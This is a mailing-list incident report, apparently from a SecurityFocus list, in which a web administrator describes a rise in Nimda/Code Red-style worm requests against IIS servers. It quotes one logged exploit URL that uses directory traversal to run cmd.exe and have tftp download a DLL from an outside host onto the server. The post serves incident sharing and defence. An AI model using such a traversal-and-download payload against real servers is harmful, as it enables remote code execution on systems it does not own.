Increase in Nimda/Code Red Variants - New Requests Made

[Joshua_Hiller () aeanet org]

I am also seeing an upsurge in Nimda-Like exploit requests.

This is just one example.

http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.19
7180.98%20GET%20cool.dll%20c:\httpodbc.dll.

Users IP : 65.197.180.98

New DLL's are showing up in these requests, although the methods of
execution remain the same.  Perhaps someone has thrashed another core
IIS/Win32 dll and is attempting to exploit?  Pretty sure httpodbc.dll is in
use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;))

Another thing I've noticed is the number of requests per IP has gone up.
Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between
50 and 80 from the infected host.

It does still appear to be automated / worm activity.

Just thought I'd let the lists know. ;-)

Joshua Hiller
Manager Web Operations
AeA
Advancing the Business of Technology


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com